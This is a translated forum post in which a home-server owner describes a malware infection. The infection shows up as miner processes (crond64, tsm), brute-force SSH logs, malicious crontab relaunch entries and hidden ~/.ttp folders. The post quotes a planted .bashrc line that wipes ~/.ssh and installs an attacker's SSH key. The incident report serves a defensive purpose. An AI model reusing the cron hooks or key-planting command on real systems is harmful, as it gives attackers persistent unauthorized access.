Baru-baru ini saya perhatikan server rumah saya menjadi sangat lambat. Semua sumber daya dimakan oleh dua proses: crond64
dan tsm
. Meskipun saya berulang kali membunuh mereka, mereka terus muncul berulang kali.
Pada saat yang sama, ISP saya memberi tahu saya tentang penyalahgunaan yang berasal dari alamat IP saya:
==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]
Saya mendapat informasi dari situs web ini bahwa saya mungkin memiliki virus. Saya menjalankan Sophos AV memindai seluruh hard drive saya dan memang menemukan beberapa virus di dalamnya /tmp/.mountfs/.rsync
. Jadi saya menghapus seluruh folder dan berpikir ini dia. Tapi itu terus datang kembali sesudahnya. Kemudian saya memeriksa file cron pengguna /var/spool/cron/crontabs/kodi
(virus itu berjalan menggunakan pengguna server media kodi saya), yang terlihat seperti ini:
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb 3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1
Sepertinya, virus mengaktifkan kembali dirinya sendiri sesekali dari direktori lain. Isi direktori itu adalah:
>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d /home/kodi/.ttp/dir2.dir
/home/kodi/.ttp/a:
a bash.pid config.txt crond32 crond64 cronda crondb dir.dir pools.txt run stop upd
/home/kodi/.ttp/b:
a dir.dir rsync run stop sync
/home/kodi/.ttp/c:
aptitude dir.dir go ip lib n p run slow start stop tsm tsm32 tsm64 v watchdog
Saya menghapus semua file ini dan entri di crontab dan berharap dengan ini, masalahnya selesai. Namun, saya akan tertarik dengan virus apa ini, bagaimana saya dapat menangkapnya (mungkin terhubung ke Kodi) dan apa yang dapat saya lakukan untuk mencegahnya. Untungnya, itu berjalan hanya dari pengguna dengan hak terbatas, tetapi masih menjengkelkan untuk dihadapi.
EDIT
Meskipun saya tampaknya menghapus semua sisa-sisa virus ini (saya juga menghapus seluruh folder tmp), virus terus datang kembali. Saya menyadari bahwa ada sebuah pintu masuk ~/.ssh/authorized_hosts
, yang tentunya tidak saya tempatkan. Ini menjelaskan bagaimana virus dapat ditanam kembali berulang kali. Saya menghapus entri, menonaktifkan login untuk pengguna itu, menonaktifkan login kata sandi (hanya passkey), dan menggunakan port non-standar sekarang.
Saya juga melihat upaya login berulang di server saya dengan nama pengguna acak, mungkin oleh beberapa jenis bot (log tampak sangat mirip dengan yang diluncurkan dari IP saya, dikirim kepada saya oleh ISP saya). Saya kira itulah cara komputer saya terinfeksi sejak awal.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
. Saya baru saja melakukan cp /etc/skel/.bashrc /home/mycompromiseduser/
untuk menghapusnya.